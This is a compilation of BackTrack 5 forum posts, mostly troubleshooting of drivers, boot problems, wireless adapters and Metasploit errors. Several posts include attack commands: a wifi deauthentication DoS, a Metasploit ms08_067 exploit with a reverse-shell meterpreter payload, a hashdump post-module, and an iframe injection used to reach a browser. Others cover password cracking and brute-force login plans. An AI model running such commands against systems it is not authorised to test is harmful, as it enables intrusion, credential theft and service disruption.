i was trying to get the 3D-Driver running on my new Laptop with Backtrack 5r3 64 bit KDE, but I had no luck so far. The Laptop has a HD 4000 Graphiccard (Ivy Bridge) + a Nvidia GT 640M LE (Optimus), Intel i7 CPU.
On my older Laptop (HD 3000 + Nvidia GT 555M) this one worked:
http://www.backtrack-linux.org/forum...ad.php?t=48904
but not on the new one.
I also tried the other drivers form x-swat, glasen, ... none was working for me.
I booted from a Xubuntu Live-DVD with a newer Kernel (3.5 I think), from there the i915-driver was recognised automatically.
So my question is: is it possible to get the driver for the HD 4000 running, or do i have to wait for the next version of backtrack?
I hope somebody can help....
-
hi everyone,
I own two wireless hotspots and i intend to expand across the town. right now i discovered that a simple
DOS attack can ruin the internet experience for my customers using a an aircrack command like;
Code:
aireplay-ng -0 0 -a (bssid) mon)
truly, i've confirmed this in several tests and apparently the person wouldn't need to even be authenticated to my
network.
now i have a couple of questions;
1. how can i protect my network against such an attack
2. if i don't hide my network ssid, is it still possible for it to be DOS'ed if the person uses a tool like
kismet to see my radio's MAC address
3. will it help if i use 5 ghz radios and connect customers to the hotspot through a 5ghz CPE since laptops
run on 2.4 or is it possible for a 5ghz frequency to also be DOS'ed?
4. is there a way to trace the person who is DOSsing the network (just in case i want to smash his head with a club :) ) ?
i'm really a noob in wireless security and will appreciate any input to help my network as i try to scale
thanks,
max
-
I have already tried this guide here
http://www.backtrack-linux.org/forum...ad.php?t=47479
But still when I boot up my HP Pavilion dv6 laptop with the usb I just get a black screen with a ticking white curser.
Can anyone help me with this?
-
Hello to all,
as regularly i fire up apt-get update && apt-get upgrade went bit wrong this time :o
hoping to get updates to my lovely backtrack5 r3 GNOME 64bit and keep it up to date, well i did but after i realize that my desktop effects is gone! so i did some google search and come a cross some threads on ubuntu forums but none of those solved my problem, it just because they are bit old and now this days have different kernel and locations and all that staff, the fix was very easy, so i decided to uninstall my ati driver and downloaded the latest vision and install it and that fixed the problem even though i didn't had much hope to fix it that way :cool:
hope that will help some1,
oh yeah the good thing about it all i didn't had to reset pyrit, pyrit was able to find my new up to date driver,
good day
-
Hi
How can I prevent my computer from being deauthentificated (aireplay-ng -0 option) ?
I guess that somebody plays every night deauthentificating all neighbours and it's very anoying. He uses different fake bssids.
Wired connection works properly but wireless is not working for me nor for many other neighbours.
It could also be some kind of interference, but it's always happening for several hours and ends at sleeping time. Other electronic devices (TV, radio, mobile, screens...) work well.
regards
-
i'am using alfa rt8187L for airbase-ng et zydas connection to my wireless connection.
i setup a fake AP in bt5r3 manually or with easy-creds,same results...
the client has a slow internet speed,it's take a century to start a youtube video or downloading something.
i don't know why is that slower than a RealAp.
In wireshark,i can see that for every get request there's 4 or 5 tcp retransmission of the same request...
i tried to change the mtu value in at0,wlan1,wlan2 intefaces ,but it's just make the client lose connection.
if you have any idea how to fix this,help will be appreciated ;)
-
hello everyone been dabbling in and out of backtrack for a while now and deciding to try out backtrack 5r3. it won't boot from my laptop via usb, it gets to the very first line(syslinux etc.) and the second line is just a blinking cursor. no problem booting from live cd but i bought a 16gb flash so i can keep it as my permanent portable backtrack drive. it will boot my my desktop but i don't have wireless in it so i was wondering if it was possible to use my linksys wrt54g running ddwrt in client mode for aircrack and the other tools. thanks.
-
hi guys i recently got bt5r3 installed on my laptop which is Dell N5110 with a intel gpu and a dedicated Nvidia gt525m gpu problem here i cant get resolution over 1024*768 i tried to install driver did alot of things are showed whole over the web been sick with that wish some1 can help me solve this out it sucks in low resolution :(
-
-
This week I have being trying to do a metasploit attack onto my Laptop and then use the webcam on it to take a picture. But I keep getting an error. Before I start to talk about the error let me show you the important details that you could need to help me out:
Laptop:
Windows 7 Ultimate Service Pack 1 32-bit
IP : 192.168.1.4 or 192.168.1.3 (It would change from one another randomly when rebooted)
Is connected to my network.
My Computer:
Windows 8 Pro 64-bit
IP : 192.168.56.1
Is connected to my network.
Has VirtualBox running on my PC to run BT5 R3.
BT5 R3 IP : 192.168.1.8
Connection Type: Bridged
Alright, now to what I did:
Click the start button thing and then clicked "Backtrack" then "Exploitation Tools" then "Network Exploitation Tools" then "MetaSploit Framework" then "msfconsole"
Also typing in "msfconsole" in the console works too :)
Below are what showed up in the console (Had to type it in manually :P):
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.4 (NOTE THIS WAS NOT TYPED IN THE COMMAND! 192.168.1.4 is My Laptop IP!)
RHOST => 192.168.1.8
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.8 (THIS TOO IS NOT A COMMAND :P 192.168.1.8 is my BT5 R3 IP!)
LHOST => 192.168.1.8
msf exploit(ms08_067_netapi) > exploit[*]Started reverse handler on 192.168.1.8:4444
[-]Exploit failed [unreachable]: Rex::HostUnreachable The host (192.168.1.4:455) was unreachable.
And sometimes the "[-]Exploit failed [unreachable]: Rex::HostUnreachable The host (192.168.1.4:455) was unreachable." would be "[-]Exploit failed [unreachable]: Rex::ConnectionTimedOut The connection to (192.168.1.4:445) was timed out."
Please Help Me Out If You Can :D
Thanks In Advance!
-
Hi,
I guess I am new to Backtrack and especially Backtrack for ARM.
I notice most of the features of the other version have been taken out.
My question is this. What can I do?
-
hello all i am just setting up backtrack as my main operating system after years of live usb boots and i want to make it feel a little more comfortable ive been a crunchbang 9 user for a long time because i like the easy customization and feel of the system
my questions are can you help me set up crunchbang 5 r3 to be more like crunchbang 9 such as adding
openbox
wicd-curses
usplash
gdm
conky
the gui package manager
and the other programs that crunchban9 uses to customize the system such as screen resolution, background image, and other such goodies i will be making a list of everything i need to get done but first and foremost i would like to get the main parts listed in the beginning done i am not asking for you to do it for me i am asking if you could guide me though it ive tried installing openbox before but there were to many issues thank you all
-
How do i Back up "apt-get dist-upgrade" downloads
I wasted 600mb+ on downloading updates how can i back them up and reinstall them(offline) on a new BT installation
My 3g dev disconnected 2 times during a critical download of flash player and opon reboot BT got Broken into lil bits all over my floor....:mad:
This is after 1 hour of downloading 300mb and this happened Twice
I hate my isp:mad:
I don't have a lot of gap to waste here so please help
-
Hello all,
I'm trying to get my RT2860 wireless adapter to do packet injection. I installed the compat-wireless drivers as described here
http://www.backtrack-linux.org/forum...ad.php?t=37549, that seemed to work well, my new driver is called RT2800PCI as described there and I can connect to the internet.
I make sure the adapter is UP and in monitor mode, then run a probe request using aireplay-ng -9 ra0 (which is my adapter as listed in iwconfig). It comes back with "Trying broadcast probe requests...No answer..Found 3 APs" (or whatever number, depending on channel).
When it tries directed probe requests, I get 0/30: 0%.
I'm on BT5 RT3 HDD Gnome 32-bit
on a MSI Wind u100 (yeah, old)
If you want to see any output from commands, let me know! Thanks in advance for any replies.
Update #1: I think the problem is that I've failed to uninstall the old driver? I've added it to the blacklist, but it seems to be running anyway.
When I run modprobe -r rt2860sta it comes back with "Fatal: Module rt2960sta is in use". The driver should now be rt2800pci after installing compat-wireless, right?
Update #2: I realised from the lsmod that the old driver was in use, so I disabled the wireless card and successfully removed the driver. On reboot, the rt2800pci-driver seems to load fine, it lists ra0 (my interface) in ifconfig and iwconfig. However, it now finds no APs, even on channel 6 (where I know my AP is located), and I got some error about bus (disappeared quickly) when trying to connect to Wicd - that also states that no networks are found.
Update #3: Oops, seems the original driver wasn't as gone as I thought. It came back after a boot! I must have done something wrong when installing compat-wireless...
If anyone can help, it would be greatly appreciated! :S
-
Hello everyone,
Please excuse my ignorance as I am totally new to BT, I've been using Ubuntu for a long time but decided to switch not to BT 5 R3.
The problem I am facing:
First, I am unable to properly install ATI driver, I always get this message(among others):
W: Possible missing firmware /lib/firmware/rtl_nic/rtl8168f-2.fw for module r8169
W: Possible missing firmware /lib/firmware/rtl_nic/rtl8168f-1.fw for module r8169
Second problem is, I try to install the ia32 bits libc and I also get this error:
W: Possible missing firmware /lib/firmware/rtl_nic/rtl8168f-2.fw for module r8169
W: Possible missing firmware /lib/firmware/rtl_nic/rtl8168f-1.fw for module r8169
>.<
My system is:
Sony VAIO SVE15127CAB
Hardware:
Graphics card: AMD Radeon HD 7650M
Software:
Backtrack 5 r3 - 64bits - Gnome desktop
What could possibly be going on? and how can I fix this?
Thanks,
-
I have a Western Digital Mybook Essential external HDD 2TB which is password locked. Well with my old OS it showed me that is unlocked, but as I changed the OS it's showing that is locked, I've already tried all the possible combinations of passwords that I could remember but no luck. I want to access the HDD somehow but I don't know how I could bypass the lock in linux.
fdisk -l doesn't show the HDD.
lsusb is showing me that it's connected
In /media/sr1 appears the WD Unlocker mounted, but the HDD itself is not showing. If I can't access the HDD by bypassing the lock then it's even possible then to retrieve the data from it if I format the locked HDD?Because as I've read the hardware locked devices have a formating technique after which the data cannot be retrieved(Is this true?).
-
-
Hi,
I am getting syntax error when trying to update metasploit using command msfupdate.
msf > msfupdate[*] exec: msfupdate
/opt/metasploit/msf3/msfupdate:79: syntax error, unexpected tLSHFT, expecting $end
<<<<<<< .mine
I am using Backtrack 5 R3 and when i tried to run metasploit I get more syntax errors. I have already tried apt-get update and apt-get upgrade
root@bt:~# msfconsole
[-] WARNING! The following modules could not be loaded!
[-] /opt/metasploit/msf3/modules/post/windows/gather/credentials/outlook.rb: SyntaxError /opt/metasploit/msf3/modules/post/windows/gather/credentials/outlook.rb:35: syntax error, unexpected tLSHFT, expecting ')'
<<<<<<< .mine
^
/opt/metasploit/msf3/modules/post/windows/gather/credentials/outlook.rb:36: syntax error, unexpected tASSOC, expecting keyword_end
'Version' => '$Revision: 16005 $',
^
/opt/metasploit/msf3/modules/post/windows/gather/credentials/outlook.rb:36: syntax error, unexpected ',', expecting keyword_end
/opt/metasploit/msf3/modules/post/windows/gather/credentials/outlook.rb:37: syntax error, unexpected tASSOC, expecting keyword_end
'Platform' => [ 'windows' ],
^
/opt/metasploit/msf3/modules/post/windows/gather/credentials/outlook.rb:37: syntax error, unexpected ',', expecting keyword_end
/opt/metasploit/msf3/modules/post/windows/gather/credentials/outlook.rb:39: syntax error, unexpected tASSOC, expecting keyword_end
'Version' => '$Revision: 16005 $',
^
/opt/metasploit/msf3/modules/post/windows/gather/credentials/outlook.rb:39: syntax error, unexpected ',', expecting keyword_end
/opt/metasploit/msf3/modules/post/windows/gather/credentials/outlook.rb:40: syntax error, unexpected tASSOC, expecting keyword_end
'Platform' => [ 'win' ],
^
/opt/metasploit/msf3/modules/post/windows/gather/credentials/outlook.rb:40: syntax error, unexpected ',', expecting keyword_end
/opt/metasploit/msf3/modules/post/windows/gather/credentials/outlook.rb:42: syntax error, unexpected tASSOC, expecting keyword_end
'SessionTypes' => [ 'meterpreter' ]
^
/opt/metasploit/msf3/modules/post/windows/gather/credentials/outlook.rb:43: syntax error, unexpected ')', expecting keyword_end
))
^
/opt/metasploit/msf3/modules/post/windows/gather/credentials/outlook.rb:379: syntax error, unexpected $end, expecting keyword_end
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|`.""'.
II 6. .P : .' / | `. :
II 'T;. .;P' '.' / | `.'
II 'T; ;P' `. / | .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 985 exploits - 540 auxiliary - 161 post
+ -- --=[ 262 payloads - 28 encoders - 8 nops
Please help
-
I am hoping someone can help by getting backtrack and aircrack + other air's tools working on the LG Optimus 2x. It has 5.50gb available and I have used a root uninstaller app to free memory by disabling many apps i dont use.
I am very new to linux and backtrack. I have an LG Optimus 2x. It only has a 5.50 gb free on the internal sd which can be unmounted. It has the external sd. I had to get the backtrack installer apk which sends me two zips one with a 3.36 backtrack img and a backtrack.sh. This is what I also used on the acer a500 but aircrack seems to not install the libssl dev and no monitor mode. On the lg I get an error message when when i vnc and a grey background message says something like
/usr/lib/libgconf2-4/gconf-sanity-check-2 exited with status 256
How can i get backtrack 5, aircrack etc with monitor mode. It should work on here. Please help! I can test what you do. Backtrack seems to work in terminal fine. I have no idea how to partition the sd. The acer a500 has the same wifi chipset as the samsung galaxy tab which can run backtrack and monitor mode for aircrack packages. I believe aircrack installed on the a500 since all the commands in help for aircrack show up in terminal. Do you have to install aircrack in the terminal in backtrack or can you use the terminal android emulator.
I am going to start learning as much as i can and one day give back to the community but for now Im a little lost. lol. I hope you can take on this project, even just one of my two devices. Thanks.
-
Hi guys, I was reading a post about the 'competition' and the discussion that ensued but I wasn't able to reply (possibly locked thread or whatnot) and not sure if anyone knows or cares but Blackbuntu appears to be out of the game. The domain has been closed as of yesterday.
So they are either waiting to see what their options are or they are out.
I think this speaks pretty highly for the Backtrack dev team (and all of you guys on the forum here doing a great job) in that you have kept this going for such a long time and continue to offer great service and support to all users in the open source community.
Well done.
Also, in case you wondered or cared, the reason I know is because I run a deca-boot system and I was checking for an update yesterday. BT is still my favourite :). BB is for when I'm lazy
-
Hello.
First of all, I'm danish and hence my English is not perfect, and sorry if this is posted in the wrong section.
I'm an university student and currently working on an exam project where I have to make an evaluation of resistance against penetration for a company.
The 3 main focus areas for my project is:
- 1) Poor network security
- 2) Known security vulnerabilities
- 3) Exploits of a login-system
* Numbers used as reference throughout the post.
The project is due 19th of December and I've scheduled time with the company I'm evaluating from 9th of December till 12th of December, where I'm to do the penetration testing.
I'm running Backtrack 5 r3 and I have an AirPCap wireless adapter.
My question to you guys is, which tests should I run to get the best results?.
I've already done a list of programs/methods I've thought of using:
1) As for the wireless protection I'm doing a scan with airmon/airodump to hack the WPA encrypted network. I have an OK wordlist, but will also be creating my own based on the company. If the airmon-set is wont work, I'll try others like wifi-honey, cowpatty etc.
2) To scan for known security vulnerabilities on the system I'll be using OpenVAS/Greenbone and Nessus. Think that'll be fine, but if some of you know of some other good programs or a hint for me, I'd be pleased to know.
3) On the company homepage there's a login-page for the intranet. I've created a user-list of logins I think they're using (like the initials of their e-mail, ex.:
gh@company.com - I will try gh) + brute-force/dictionary attack the password. For the dictionary attack I will add/create specific words and compositions of words that would fit the company (ex.: If the company is making cars, perhaps some passwords contain names of cars etc.)
For brute-forcing/dictionary attacking I'll use hydra and the firefox plugin FireForce.
This is actually the one I'm the most concerned about. Haven't been able to find that much on brute-forcing/dictionary attacking, so help here would be appreciated.
The webserver runs Apache, haven't checked the version yet since I'm still awaiting approval from the network-manager, though I'm 100% sure he'll say yes (Made an agreement with the CEO of the company).
This means I've not done any research yet, since I need an approval (Don't want to do any illegal).
I won't be doing any social engineering or backdooring (manually planting backdoors etc.) on their system, since I wont have enough time. Perhaps planting an automatic created backdoor from metasploit just to check their anti-virus, but nothing more than that.
If you have any questions regarding this project I'd be glad to give you a link, but it's in danish so you'd probably not understand much of it.
I hope you can give me some advice on this.
TL;DR:
Doing a security penetrating test on a company and need help with hints/tips/program advice.
Thank you in advance,
- M.
-
I put up a intel syntax reference guide which is pretty useful when debugging.
http://www.fuzzysecurity.com/tutorials/12.html
Happy Hunting ;))
b33f
-
-
Hi all, new to bt and pen testing as well. I have a .xls file that is password protected to open and I can not remember my password. I am aware that there are specific programs for this available but I can not find any freeware (everything cost around 30$, which is crazy for 1 file). I have a pretty good idea what the password is so i was going to try some sort of brute force with specific characters or a decryption method. I was reading up on John the ripper and found "John the Ripper 1.7.7-jumbo-6 integrates preliminary support for several non-hashes, ......, password-protected PDF files with 40-bit and 128-bit RC4 encryption". I understand that this says pdf file but my .xls file is a 40bit rc4 encryption. Would it be possible to use JTR on this file? Should i be using a different tool? Any help would be much appreciated.
-
I have error in Armitage
OS: backtrack5 r3
This is error, i have reinstall metasploit install metasploit from www.metasploit.com but not work.
This error is on all Post ... can Help me??? :(
PHP Code:
msf > use post/linux/gather/hashdump
msf post(hashdump) > set SESSION 1
SESSION => 1
msf post(hashdump) > run -j[*] Post module running as background job
[-] Post failed: ArgumentError Missing required option :session
[-] Call stack:
[-] /opt/metasploit/msf3/lib/msf/core/db.rb:744:in `report_session_event'
[-] /opt/metasploit/msf3/lib/msf/core/framework.rb:442:in `on_session_module_run'
[-] /opt/metasploit/msf3/lib/msf/core/event_dispatcher.rb:183:in `block in method_missing'
[-] /opt/metasploit/msf3/lib/msf/core/event_dispatcher.rb:181:in `each'
[-] /opt/metasploit/msf3/lib/msf/core/event_dispatcher.rb:181:in `method_missing'
-
Hi all friends , Recently I've been a member here ...
I've done well in all the steps prior to the boot , example : install vmware/virtualbox , add ISO File , Space allocation and etc.Even see "How install BT" Video in Youtube . But I have a problem. When click on "Power On" Option, BackTrack Loaded and entered the Boot page.
I clicked on first Options " Default Boot Text Mode"
and so , Stoped with below error :
kernel panic-not syncing : VFS : unable to mount root fs on unknown-block(2,0
I I mentioned this problem in many places , But no one could be held accountable.
Thanks
-
I am sure there are 100's of tuts out there explaining how to fix this. No actually I know for a fact there are, because I have tried nearly all of them..
I have an ATI Radeon HD 5700, 8.892.0.0(Driver version)
Trying to run a Live CD install with BT5R3 GNOME.
I have already used this OS on VM, so that may or may not be a problem, that's why I am here.
This is pretty much how it goes,
I boot up, get to the tab screen, press it, (have tried changing the line by adding
Quote:
xforcevesa noapic noapci nosplash irqpoll -- after initrd.gz
) hit enter, does the loading it should, then either shuts off my keyboard at the bt5 screen (Failing to use the ports, apparently. I cannot remember the exact error) or it blank screens me, and does not detect my monitor anymore. (HDMI NO SIGNAL)
It is also important to point out, that I am trying to dual boot windows 7 and Backtrack 5 r3.
SYSTEM INFORMATION
Quote:
OS Name Microsoft Windows 7 Ultimate
Version 6.1.7601 Service Pack 1 Build 7601
Other OS Description Not Available
OS Manufacturer Microsoft Corporation
System Name BELKIN
System Manufacturer Gigabyte Technology Co., Ltd.
System Model GA-970A-UD3
System Type x64-based PC
Processor AMD Phenom(tm) II X4 955 Processor, 3200 Mhz, 4 Core(s), 4 Logical Processor(s)
BIOS Version/Date Award Software International, Inc. F1, 5/17/2011
SMBIOS Version 2.4
Windows Directory C:\Windows
System Directory C:\Windows\system32
Boot Device \Device\HarddiskVolume4
Locale United States
Hardware Abstraction Layer Version = "6.1.7601.17514"
User Name BELKIN\Jobes
Time Zone Central Standard Time
Installed Physical Memory (RAM) 8.00 GB
Total Physical Memory 8.00 GB
Available Physical Memory 5.89 GB
Total Virtual Memory 16.0 GB
Available Virtual Memory 13.3 GB
Page File Space 8.00 GB
Page File C:\pagefile.sys
Thanks,
Kodeki
/wave
-
Hi, I currently have linux mint and windows 7, I wanted to try backtrack, the download went perfectly, I checked the md5 sum, and I mounted it, but after that nothing happens, usually in mint a program runs automatically the settings to install, but this didn't happen for me, when I open the mounted iso I see files only, the same problem happened when I tried install arch linux, I am really sorry if this is a noob question but I tried everything to find a way to install it but I ran out of options and this is my last resort.
I am using HP laptop Intel core I7 Radeon graphic card.
Thank you for your help!
-
-
Looking for some tips on browser fingerprinting.
In context, this is specifically what I'm trying to do (in a lab):
There's a client which is periodically browsing a webpage. I've got root on the webserver, and added a simple iframe to the page the browser gets, with a source address to my attacking machine. Now that it's sending GETs to me, I want to fingerprint it to try and attack the browser somewhat intelligently.
I have:
1) Googled the User Agent, as it shows in the access log on the webserver. Got absolutely nothing useful (that is, nothing new compared to what I got in item 2)
2) metasploit browser_autopwn ACTION=DefangedDetection tells me that it's Microsoft Windows Vista, x86. Nothing about the browser, sadly.
I am going to try BeEF... just found the tool via google, looks like it is already installed, and I just need to set it up:
http://code.google.com/p/beef/wiki/MSFIntegration
Does anyone else have any other tools/methods they would recommend?
-
Hello guys,
I'm kind of new to Backtrack but I have some good understanding of how things work, I have a Lenovo Ideapad Y560 with an built in Atheros AR9285, I have read lots and lots of tutorials and guides to see how to fix the following problem:
I don't get any results when I type Airmon-ng, I have installed Compat wireless 2.6.38-rc4-1.tar.bz2 and WICD
I have also made sure that in WICD>Preferences>Wireless Adapter it has WLAN0 in it...
Furthermore, I have installed the Aircrack installation...
What should I do?
Thanks in Advance!
-
-
Hello All,
I am using BT 5 R3 version with default log/pass (root:toor). But today I made a upgrade about system and it was very big update actually, unfortunately i did not look too much when it is updating files.
After that when I reboot the computer, there was a different login window like (not command console), and root:toor did not work and gave me the message: "Root logins are not allowed". Now I can not enter the BT :( Could you help me about it please?
BR,
Axmetmcl
-
Good evening everyone.
Im pretty new in unix os and i really need your help right now. Im facing problems installing my sound card on backtrack :(
I've seen a lot of forums so far but i cant find a solution.
My soundcard is Realtek, though it seems to be recognised as ATI (my graphics card is ATI just for some more info)
I used lspci in terminal to see what hardware i have installed on my computer. The result was this:
Code:
lspci
00:00.0 Host bridge: Advanced Micro Devices [AMD] RS880 Host Bridge
00:01.0 PCI bridge: Advanced Micro Devices [AMD] RS780/RS880 PCI to PCI bridge (int gfx)
00:04.0 PCI bridge: Advanced Micro Devices [AMD] RS780 PCI to PCI bridge (PCIE port 0)
00:05.0 PCI bridge: Advanced Micro Devices [AMD] RS780 PCI to PCI bridge (PCIE port 1)
00:11.0 SATA controller: ATI Technologies Inc SB7x0/SB8x0/SB9x0 SATA Controller [AHCI mode]
00:12.0 USB Controller: ATI Technologies Inc SB7x0/SB8x0/SB9x0 USB OHCI0 Controller
00:12.2 USB Controller: ATI Technologies Inc SB7x0/SB8x0/SB9x0 USB EHCI Controller
00:13.0 USB Controller: ATI Technologies Inc SB7x0/SB8x0/SB9x0 USB OHCI0 Controller
00:13.2 USB Controller: ATI Technologies Inc SB7x0/SB8x0/SB9x0 USB EHCI Controller
00:14.0 SMBus: ATI Technologies Inc SBx00 SMBus Controller (rev 41)
00:14.1 IDE interface: ATI Technologies Inc SB7x0/SB8x0/SB9x0 IDE Controller (rev 40)
00:14.2 Audio device: ATI Technologies Inc SBx00 Azalia (Intel HDA) (rev 40)
00:14.3 ISA bridge: ATI Technologies Inc SB7x0/SB8x0/SB9x0 LPC host controller (rev 40)
00:14.4 PCI bridge: ATI Technologies Inc SBx00 PCI to PCI Bridge (rev 40)
00:18.0 Host bridge: Advanced Micro Devices [AMD] Family 10h Processor HyperTransport Configuration
00:18.1 Host bridge: Advanced Micro Devices [AMD] Family 10h Processor Address Map
00:18.2 Host bridge: Advanced Micro Devices [AMD] Family 10h Processor DRAM Controller
00:18.3 Host bridge: Advanced Micro Devices [AMD] Family 10h Processor Miscellaneous Control
00:18.4 Host bridge: Advanced Micro Devices [AMD] Family 10h Processor Link Control
01:05.0 VGA compatible controller: ATI Technologies Inc M880G [Mobility Radeon HD 4200]
01:05.1 Audio device: ATI Technologies Inc RS880 Audio Device [Radeon HD 4200]
02:00.0 Ethernet controller: Broadcom Corporation NetLink BCM57780 Gigabit Ethernet PCIe (rev 01)
08:00.0 Network controller: Broadcom Corporation BCM43225 802.11b/g/n (rev 01)
Any help, appreciated!
Thanks
-
Hi All,
Have an old laptop that has been through the wars a bit, its known as a clevo m121w series laptop (32bit only).
It loads up the live cd fine and enters into the text modes fine - the os in terminal is working flawlessly.
when i try to run startx, I get a harddrive read for 5 seconds and a cursor that stops flashing and black screen (seems to halt)
regardles of how long i leave it, no change.
i also tried running ubiquity or sh -c ubiquity from the command-line
the laptop thinks for a 30 seconds and then i get a prompt with no other action if i run the command again it goes straight to a prompt without any thought.
would like to get this installed on the laptop, is their any commands that i can run to complete this or get some indication on what is causing the issue - any commands to find either would be helpful.
have downloaded checked the hash and did 2 burns one fast and one slow - no difference.
the version is BT5r3 Gnome 32bit
Also completed the x wont start commands under basic usage in the wiki - the commands there made no difference either.
thanks
-
Backtrack suffers from some bad Ubuntu-style. The Isolinux.cfg file has wrong file-paths : /cdrom/preseed[or_what_ever]
First cdrom is not native linux. As far as I know only Ubuntu uses it. (At least it is not on my Debian/Gentoo machines)
But nevertheless /cdrom should be omitted in the path so the pathes in the .cfg files are just /preseed[or_what_ever]
(witout the previous /cdrom)
This results in a lot of trouble, when trying to create a bootable BT USB-Drive in other distros from a BT5.iso . For example using
http://www.backtrack-linux.org/wiki/...Persistent_USB doesn't work outside of an Ubuntu environment. The
reason is that syslinux creates wrong .cfg files and the result is a "[...] can't mount [file].squasfm bla bla /dev/loop1 ERROR [...]"
Moreover instead of syslinux /dev/sdb1 the command syslinux -i /dev/sdb1 should be used.
My advice is to rebuild/repack the iso image without "/cdrom"... Just delating it manually inside all .cfg files doesn't work. I don't
know exactly why, but I guess because the initram's are wrong and the sylinux.bin and .c32, too
Mybee a short workarount is to create a folder /dev/sdXn/cdrom and put everything that was previously in /dev/sdbXn into that folder.
Then the path is correct again, but of course thats some ugly workaround....
In my opinion BT should give an .img file for download that we just write as plain raw data to USB using " dd if=....". Thats the
way debian goes and it is very handy. U can say that dd is a dangerous tool, but BT is for administators, isn't it?
Cheers....
-
i got a problem in my ALFA AWUS036NHR on airodump-ng
(no assocciated) even in my roter with computers connected i still have(no assocciated)
how to solve the problem? someone help me pls
tnk you!
-
Hello everyone. I want to generate a dictionary to hack a password I've forgotten. The password is a phrase that I remember, but some of the characters are numbers and letters. I don't recall which are which.
For example:
ilove:doggers could be
il0v3:d0gG3r5
iLove:d0gge12s etc.
so I have a 12-13 character password and I have each character narrowed down to 2 or 3 possibilities. Is there a way to have crunch generate that list for me? I've read the man page and couldn't figure it out.
-
I've been using BT5 r3 since it was released, I'm a student in my final year studying PT and EH. Recently I have noticed problems with JTR and cracking NTLM and some MD5 passwords.
From what I gather john seems to cache the previous list thus making the job in hand more difficult. I like john its ideal for some situations but this puts me off.
Is anyone experiencing anything like this or could shed some light on the subject.
Primarily I don't do that much password cracking with john, but would like to find a fix. Or if someone can point me in a more applicable solution :-D that would be far better.
Generally Ophcrack will get most pwords I'm after with GPU support, but I'm right in the middle of exams - and am struggling to dig into the problem myself.
Most pwords are alpha-numberic with symbols and over 8 characters.
I did have an account on here - but lost it when my university changed to using outlook.com agggggggggg.
Thanks folks.
-
I'm getting this error when starting the msfconsole
Code:
root@bt:~# msfconsole
[-] ***
[-] *
[-] * Metasploit now requires version 0.11 or higher of the 'pg' gem for database support
[-] * There a three ways to accomplish this upgrade:
[-] * 1. If you run Metasploit with your system ruby, simply upgrade the gem:
[-] * $ rvmsudo gem install pg
[-] * 2. Use the Community Edition web interface to apply a Software Update
[-] * 3. Uninstall, download the latest version, and reinstall Metasploit
[-] *
[-] ***
[-]
[-]
[-] Failed to connect to the database: Please install the postgresql adapter: `gem install activerecord-postgresql-adapter` (RubyGem version error: pg(0.9.0 not ~> 0.11)
) {"adapter"=>"postgresql", "database"=>"msf3", "username"=>"msf3", "password"=>"cc714249", "host"=>"127.0.0.1", "port"=>7175, "pool"=>75, "timeout"=>5} ["/opt/framework/ruby/lib/ruby/1.9.1/rubygems.rb:751:in `report_activate_error'", "/opt/framework/ruby/lib/ruby/1.9.1/rubygems.rb:214:in `activate'", "/opt/framework/ruby/lib/ruby/1.9.1/rubygems.rb:1054:in `gem'", "/opt/framework/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/connection_adapters/postgresql_adapter.rb:7:in `<top (required)>'", "/opt/framework/msf3/lib/fastlib.rb:374:in `require'", "/opt/framework/msf3/lib/fastlib.rb:374:in `require'", "/opt/framework/msf3/lib/gemcache/ruby/1.9.1/gems/activesupport-3.2.8/lib/active_support/dependencies.rb:251:in `block in require'", "/opt/framework/msf3/lib/gemcache/ruby/1.9.1/gems/activesupport-3.2.8/lib/active_support/dependencies.rb:236:in `load_dependency'", "/opt/framework/msf3/lib/gemcache/ruby/1.9.1/gems/activesupport-3.2.8/lib/active_support/dependencies.rb:251:in `require'", "/opt/framework/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/connection_adapters/abstract/connection_specification.rb:50:in `resolve_hash_connection'", "/opt/framework/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/connection_adapters/abstract/connection_specification.rb:29:in `spec'", "/opt/framework/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/connection_adapters/abstract/connection_specification.rb:129:in `establish_connection'", "/opt/framework/msf3/lib/msf/core/db_manager.rb:208:in `connect'", "/opt/framework/msf3/lib/msf/ui/console/driver.rb:195:in `initialize'", "/opt/framework/msf3/msfconsole:148:in `new'", "/opt/framework/msf3/msfconsole:148:in `<main>'"]
I installed the postgresql adapter
Code:
root@bt:~# gem install activerecord-postgresql-adapter
Successfully installed activerecord-postgresql-adapter-0.0.1
1 gem installed
Installing ri documentation for activerecord-postgresql-adapter-0.0.1...
Installing RDoc documentation for activerecord-postgresql-adapter-0.0.1...
Also the pg
Code:
root@bt:~# gem install pg
Building native extensions. This could take a while...
Successfully installed pg-0.14.1
1 gem installed
Installing ri documentation for pg-0.14.1...
Installing RDoc documentation for pg-0.14.1...
Reinstalled postgresql
Code:
root@bt:~# apt-get install postgresql
Reading package lists... Done
Building dependency tree
Reading state information... Done
postgresql is already the newest version.
The following packages were automatically installed and are no longer required:
ettercap
Use 'apt-get autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 24 not upgraded.
And after all this, I still get the same error above.
What should I do next?
-
Hi,
I'm a security technician trainee on a task to find vulnerabilities of over 800 multifunction printers (MFPs) connected to an internal network and so far I found a few using basic pentesting methods and knowledge about MFPs vulnerabilities.
Doing this task manually is very time consuming, as you can understand, and was wondering if someone could recommend me a passive vulnerability scanner that can help out with the task? Going trough each printer host manually and check for vulnerabilities is to time consuming and using an active vulnerability scanner like Nessus is not recommended for scanning printers as I understand it? Also I can't use Nessus home edition for this task and openVAS is also an active scanner, so I'm out of options here I feel.
Also I'm aware that the results from vulnerability scanners are not 100% accurate and can miss some information, but at least its a bit useful during the work I have to do.
Appreciate any other recommendation to make this task easier.
Edit: I got help from my supervisor letting me know it is ok to use openVAS, so no need for a passive scanner which I misunderstand the use of from beginning.
-
Hello, I hope this is the right section for my question..
